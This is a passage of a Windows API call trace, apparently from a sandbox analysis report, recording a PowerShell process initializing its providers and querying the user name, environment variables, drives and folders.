samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x0) returned 0x2 [0254.394] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x394) returned 0x0 [0254.394] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x0) returned 0x2 [0254.394] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x398) returned 0x0 [0254.394] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x0) returned 0x2 [0254.395] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x39c) returned 0x0 [0254.395] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x0) returned 0x2 [0254.395] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x3a0) returned 0x0 [0254.395] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x0) returned 0x2 [0254.395] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x0) returned 0x5 [0254.402] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x3a4) returned 0x0 [0254.402] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x0) returned 0x2 [0254.402] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x3a8) returned 0x0 [0254.403] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cef8 | out: phkResult=0x16cef8*=0x3ac) returned 0x0 [0254.403] RegCloseKey (hKey=0x3ac) returned 0x0 [0254.403] RegCloseKey (hKey=0x38c) returned 0x0 [0254.403] RegCloseKey (hKey=0x3a8) returned 0x0 [0254.670] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1bb30008 [0254.678] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x34886e0*="WSMan", lpRawData=0x3488450) returned 1 [0254.690] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0254.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0254.691] CoTaskMemFree (pv=0x343650) [0254.693] CoTaskMemAlloc (cb=0x804) returned 0x1ba607f0 [0254.693] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba607f0, nSize=0x16d188 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d188) returned 0x1 [0254.695] CoTaskMemFree (pv=0x1ba607f0) [0254.695] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.695] GetUserNameW (in: lpBuffer=0x3220d0, pcbBuffer=0x16d1c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d1c8) returned 1 [0254.696] CoTaskMemFree (pv=0x3220d0) [0254.698] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x348dbc8*="Alias", lpRawData=0x348d958) returned 1 [0254.754] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0254.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0254.756] CoTaskMemFree (pv=0x343650) [0254.758] CoTaskMemAlloc (cb=0x804) returned 0x1ba607f0 [0254.758] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba607f0, nSize=0x16d188 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d188) returned 0x1 [0254.759] CoTaskMemFree (pv=0x1ba607f0) [0254.760] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0254.760] GetUserNameW (in: lpBuffer=0x3220d0, pcbBuffer=0x16d1c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d1c8) returned 1 [0254.761] CoTaskMemFree (pv=0x3220d0) [0254.762] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3493170*="Environment", lpRawData=0x3492f00) returned 1 [0254.765] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0254.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0254.765] CoTaskMemFree (pv=0x343650) [0254.767] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0254.767] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0254.767] CoTaskMemFree (pv=0x343650) [0254.767] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0254.767] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0254.768] CoTaskMemFree (pv=0x343650) [0254.769] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x16cf40 | out: lpFileInformation=0x16cf40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0254.769] SetErrorMode (uMode=0x1) returned 0x1 [0254.922] GetLogicalDrives () returned 0x4 [0255.382] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0255.382] SetErrorMode (uMode=0x1) returned 0x1 [0255.383] CoTaskMemAlloc (cb=0x68) returned 0x1ba35610 [0255.383] CoTaskMemAlloc (cb=0x68) returned 0x1ba35680 [0255.383] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ba35610, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x16cf10, lpMaximumComponentLength=0x16cf0c, lpFileSystemFlags=0x16cf08, lpFileSystemNameBuffer=0x1ba35680, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16cf10*=0x705ba84c, lpMaximumComponentLength=0x16cf0c*=0xff, lpFileSystemFlags=0x16cf08*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0255.385] CoTaskMemFree (pv=0x1ba35610) [0255.385] CoTaskMemFree (pv=0x1ba35680) [0255.385] SetErrorMode (uMode=0x1) returned 0x1 [0255.385] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0255.386] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16ceb0 | out: lpFileInformation=0x16ceb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0255.386] SetErrorMode (uMode=0x1) returned 0x1 [0255.386] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cc50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0255.387] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0255.387] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0255.387] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16cce0 | out: lpFileInformation=0x16cce0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0255.388] SetErrorMode (uMode=0x1) returned 0x1 [0255.388] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0255.388] SetErrorMode (uMode=0x1) returned 0x1 [0255.388] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16cce0 | out: lpFileInformation=0x16cce0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0255.388] SetErrorMode (uMode=0x1) returned 0x1 [0255.389] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16cd80 | out: lpFileInformation=0x16cd80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0255.389] SetErrorMode (uMode=0x1) returned 0x1 [0255.389] CoTaskMemAlloc (cb=0x804) returned 0x1ba607f0 [0255.389] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba607f0, nSize=0x16d188 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d188) returned 0x1 [0255.390] CoTaskMemFree (pv=0x1ba607f0) [0255.390] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0255.390] GetUserNameW (in: lpBuffer=0x3220d0, pcbBuffer=0x16d1c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d1c8) returned 1 [0255.391] CoTaskMemFree (pv=0x3220d0) [0255.391] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x349a1c8*="FileSystem", lpRawData=0x3499f58) returned 1 [0255.393] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0255.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0255.393] CoTaskMemFree (pv=0x343650) [0255.394] CoTaskMemAlloc (cb=0x804) returned 0x1ba607f0 [0255.394] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba607f0, nSize=0x16d188 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d188) returned 0x1 [0255.395] CoTaskMemFree (pv=0x1ba607f0) [0255.395] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0255.395] GetUserNameW (in: lpBuffer=0x3220d0, pcbBuffer=0x16d1c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d1c8) returned 1 [0255.395] CoTaskMemFree (pv=0x3220d0) [0255.396] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x349f9b8*="Function", lpRawData=0x349f748) returned 1 [0255.397] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0255.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0255.397] CoTaskMemFree (pv=0x343650) [0255.877] CoTaskMemAlloc (cb=0x804) returned 0x1ba607f0 [0255.877] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba607f0, nSize=0x16d188 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d188) returned 0x1 [0255.877] CoTaskMemFree (pv=0x1ba607f0) [0255.877] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0255.878] GetUserNameW (in: lpBuffer=0x3220d0, pcbBuffer=0x16d1c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d1c8) returned 1 [0255.878] CoTaskMemFree (pv=0x3220d0) [0255.879] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3139368*="Registry", lpRawData=0x31390f8) returned 1 [0255.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0255.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0255.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0255.883] CoTaskMemAlloc (cb=0x804) returned 0x1ba607f0 [0255.883] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba607f0, nSize=0x16d188 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d188) returned 0x1 [0255.883] CoTaskMemFree (pv=0x1ba607f0) [0255.883] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0255.883] GetUserNameW (in: lpBuffer=0x3220d0, pcbBuffer=0x16d1c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d1c8) returned 1 [0255.884] CoTaskMemFree (pv=0x3220d0) [0255.884] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x313e730*="Variable", lpRawData=0x313e4c0) returned 1 [0255.887] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0255.887] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0255.887] CoTaskMemFree (pv=0x343650) [0255.925] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0255.925] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0255.925] CoTaskMemFree (pv=0x343650) [0255.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16ca30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0255.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0255.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0255.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0256.080] CoTaskMemAlloc (cb=0x804) returned 0x1ba607f0 [0256.080] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba607f0, nSize=0x16d188 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d188) returned 0x1 [0256.081] CoTaskMemFree (pv=0x1ba607f0) [0256.081] CoTaskMemAlloc (cb=0x204) returned 0x3220d0 [0256.081] GetUserNameW (in: lpBuffer=0x3220d0, pcbBuffer=0x16d1c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d1c8) returned 1 [0256.081] CoTaskMemFree (pv=0x3220d0) [0256.088] ReportEventW (hEventLog=0x1bb30008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x31522f8*="Certificate", lpRawData=0x3152088) returned 1 [0256.107] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.107] CoTaskMemFree (pv=0x343650) [0256.112] GetLogicalDrives () returned 0x4 [0256.113] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16ce10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0256.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0256.115] CoTaskMemAlloc (cb=0x20e) returned 0x32e200 [0256.115] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x32e200 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0256.115] CoTaskMemFree (pv=0x32e200) [0256.116] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.117] CoTaskMemFree (pv=0x343650) [0256.117] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.117] CoTaskMemFree (pv=0x343650) [0256.135] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.136] CoTaskMemFree (pv=0x343650) [0256.137] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.137] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.138] CoTaskMemFree (pv=0x343650) [0256.139] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16cdd0 | out: lpFileInformation=0x16cdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xabdb7dc0, ftLastAccessTime.dwHighDateTime=0x1d60de6, ftLastWriteTime.dwLowDateTime=0xabdb7dc0, ftLastWriteTime.dwHighDateTime=0x1d60de6, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0256.139] SetErrorMode (uMode=0x1) returned 0x1 [0256.139] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x16cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19 [0256.139] SetErrorMode (uMode=0x1) returned 0x1 [0256.139] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x16cdd0 | out: lpFileInformation=0x16cdd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xabdb7dc0, ftLastAccessTime.dwHighDateTime=0x1d60de6, ftLastWriteTime.dwLowDateTime=0xabdb7dc0, ftLastWriteTime.dwHighDateTime=0x1d60de6, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0256.139] SetErrorMode (uMode=0x1) returned 0x1 [0256.140] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.140] CoTaskMemFree (pv=0x343650) [0256.172] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16cd90 | out: lpFileInformation=0x16cd90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0256.172] SetErrorMode (uMode=0x1) returned 0x1 [0256.172] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0256.173] SetErrorMode (uMode=0x1) returned 0x1 [0256.173] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16cd90 | out: lpFileInformation=0x16cd90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0256.173] SetErrorMode (uMode=0x1) returned 0x1 [0256.173] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16cb90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0256.173] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0256.173] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0256.173] SetErrorMode (uMode=0x1) returned 0x1 [0256.173] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x16cd90 | out: lpFileInformation=0x16cd90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0256.174] SetErrorMode (uMode=0x1) returned 0x1 [0256.174] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0256.174] SetErrorMode (uMode=0x1) returned 0x1 [0256.174] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x16cd90 | out: lpFileInformation=0x16cd90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0256.174] SetErrorMode (uMode=0x1) returned 0x1 [0256.174] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x16cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0256.174] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0256.174] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x16cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0256.174] SetErrorMode (uMode=0x1) returned 0x1 [0256.175] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x16cd90 | out: lpFileInformation=0x16cd90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0256.175] SetErrorMode (uMode=0x1) returned 0x1 [0256.175] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x16cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11 [0256.175] SetErrorMode (uMode=0x1) returned 0x1 [0256.175] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x16cd90 | out: lpFileInformation=0x16cd90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, 